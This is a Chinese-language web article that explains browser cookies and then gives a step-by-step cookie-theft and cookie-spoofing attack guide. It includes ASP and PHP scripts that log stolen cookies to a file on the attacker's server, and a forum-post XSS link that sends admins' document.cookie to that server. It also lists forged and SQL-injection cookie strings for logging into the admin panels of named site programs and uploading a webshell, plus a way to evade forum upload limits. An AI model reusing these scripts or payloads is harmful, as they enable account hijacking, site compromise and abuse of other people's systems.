|
众所周知,浏览网页时网页程序会在你的硬盘上创建一个Cookie文本文件,在XP的C:\Documents and Settings\XP登录用户名\Cookie目录下,你可以看到这些Cookie文件,格式为:XP用户名@网站地址[数字].txt。
一、Cookie是什么?
为了方便用户浏览、准确收集访问者信息,很多网站都采用了Cookie技术。Cookie文件中存放了一些MD5加密信息,比如用户ID、密码、停留时间等,如果网站在你的硬盘上创建了Cookie,以后再次访问该站时,网站就会读取该Cookie然后做出相应的动作,例如不输入用户ID、密码直接登录,进行身份和权限验证等。
Cookie分成持久Cookie和会话Cookie(session Cookie)两种类型。前者保存在你的电脑硬盘中(通常是加密的),例如你首次访问某站时,服务器会在数据库中新建一个唯一的ID,并把该ID记录在持久Cookie中传送给你;以后再次来访时,服务器会读取该Cookie,判断你是否为老用户,或者计算访问次数等操作。持久Cookie可能会遭到Cookie欺骗及针对Cookie的跨站脚本攻击,不如session Cookie安全。
会话Cookie位于服务器端、保存在内存(浏览器进程)中,当你浏览某网页时创建,关闭此页即删除。例如这样一个会话Cookie:首次登录网站时,服务器会验证你的授权证书创建一个会话Cookie,在不关闭浏览器的情况下、如果你再次访问该站,服务器就会读取该会话Cookie验证你是谁,验证通过后,服务器将返回你请求的页面,否则你就得重新登录,一旦登出该站,会话Cookie即被删除,你的会员权限也将随之终止。
二、查看Cookie方法
要查看CookIE,你可以启动IE,点击菜单“工具”→“Internet选项”,在“常规”选项卡中点“设置”→“查看文件”,即可看到你硬盘中所有的Cookie文件,这些TXT文件通常以@domain格式命名,domain是你访问过的网站域名。
此外,你也可以使用IECookieView来查看、修改删除或保存Cookie文件。启动IECookieView,软件上半部窗口会列出你登录过的网站信息,其中Hits列记录了Cookie被网站读取的次数;选中某个网站(例如35me.cn),在下面窗口中就会列出该站生成的Cookie内容,有KEY、Value、Domain、Created In等列,其中Created In列的值如果为Client,表示该Cookie是网页中的JavaScript or VBScript代码生成的,如为Server,则是网页中的JAVA、asp.net、asp、php、jsp代码创建的(即服务器端运行的程序生成的);Value列中一般存放用户名、用户ID、访问次数、访问来路网址等信息,通过查看Value列,你可以发现一些个人隐私,例如网站的登录用户名、密码等。为此,建议你在公共场所上网后,要运行IECookieView,点击菜单“Destroy All Except The Selected Cookies”删除全部Cookie文件,以免帐号、密码等隐私信息外泄。
三、Cookie欺骗攻击案例
Cookie欺骗是常见的攻击网站方式,所谓Cookie欺骗,就是将别人的Cookie向服务器提交,冒充别人的身份登录网站。要用Cookie欺骗攻击某站,首先需要获得该站管理员的Cookie,方法如下:
1、获得管理员Cookie
(1)收集Cookie程序
用FrontPage2003写一个收集别人Cookie的程序Cookies.asp,代码如下:
<%
testfile=Server.MapPath("cookmm.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
将它上传到你的网站空间中(网站空间要支持ASP运行),以后访问者只要执行了该程序,他的Cookie就会被收集到cookmm.txt文件中;为了能同时显示被攻击站首页,在Cookies.asp中还应增加以下代码:
window.location.href="被攻击站的域名>"
以上是ASP代码,具有同样功能的Cookies.php程序,代码如下:
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("Cookies.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: 被攻击站的域名>");
?>
(2)在论坛中发帖
在论坛中发帖,诱使别人点击帖内URL,只要访问者点击了该URL,他登录论坛时产生的Cookie就会保存在cookmm.txt文件中,URL代码如下:
javascript:window.open(‘你的网站域名>/Cookies.asp?msg=’+document.Cookie)
msg后边的document.Cookie表示访问此帖用户的Cookie,如果论坛过滤javascript字符,则在帖子中将javascript写成ASCII码(比如j写成“j”)
例如黑鹰论坛有头像漏洞,如果要攻击可以在论坛中发帖,在论坛的头像地址中输入如下代码: javascript:windows.open('你的网站域名>/ Cookies.asp?msg='+documents.Cookie)写好了后提交,然后在论坛上发帖子,只要管理员浏览你的帖子,即可拿到他的Cookie,他登录论坛时产生的Cookie会保存在cookmm.txt文件中!
1.利用Cookie欺骗攻击网站
偷到网站管理员Cookie后,就能利用Cookie欺骗攻击该站了,方法是:打开要攻击站后台管理页面,用“老兵Cookie欺骗工具”向该站服务器提交管理员Cookie,这样即可冒充管理员绕过密码验证登入后台,然后再通过后台的上传功能上传木马拿下Webshell,下面我们以入侵“讯时管理系统”网站为例,介绍操作步骤。
用“讯时管理系统”代码建的网站有Cookie欺骗漏洞,打开“桂林老兵Cookies的欺骗工具”,在address栏中输入该站管理员登录页地址,尝试使用以下两个Cookies进行注入:
admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd或者
admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'
点击“桂林老兵Cookies的欺骗工具”工具栏上的黄色小锁按钮,把以上2个Cookies分别复制到Cookies框中,再点击右边的“连接”按钮,看能否直接进入后台登录页面,如果能进入,说明该Cookie注入获得成功;例如我们将admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'粘贴到Cookies框中,点右边的“连接”按钮,发现成功以'or'='or'身份登入该站后台管理系统,最后你可以传马拿下该站。
以下是Cookie欺骗攻击网站案例。
网站程序名
管理员登录页地址
攻击时使用的Cookies
LeadBBS V3.14 美化插件版
gbtoyAtBD=0; path=/ASPSESSIONIDAQDRRDBD=DMMBDEPBNOGCKDGKBKEHGHAN; path=/gbtoyTime=2005%2D3%2D25+19%3A48%3A19; path=/gbtoy=pass=111222333&user=%B0%D7%CC%EC%B5%C4%C3%A8; path=/
修改以上Cookies ,user=后面是会员ID,把总斑竹的ID换上去;冒充总斑竹登入后台后,在上传文件参数里添加.asp文件(在.asp后多加一个空格),上传木马时也要在扩展名后多打一个空格。
JIMMY中文站留言簿 v1.08
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh
商贸通2006地方门户版系统
adminID=5;admin=admin;adminflag=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
2.利用Cookie欺骗实现无限上传
在百度或GOOGLE中搜索“动网论坛”找到一个动网论坛,打开该论坛注册一个会员名,随之你的硬盘上就会生成一个Cookie文件,以后登录论坛后只能上传5个文件,如果你想上传无限个文件,可以删除本地硬盘中的Cookie,因为会员上传文件的数量保存在Cookie中,删除之即可重新上传5个文件,操作步骤:
启动IE,点击菜单“工具”/Internet选项,在“常规”选项卡中点“删除Cookies”,删除本地Cookie,然后刷新论坛,此时会看到你的登录无效、需要重新登录;接下来重新登录,然后你又可以再上传5个文件了,如此循环进行删除Cookie、上传文件操作,这样即可实现无限上传,估计要不了多久论坛空间就会被你撑破的! | |
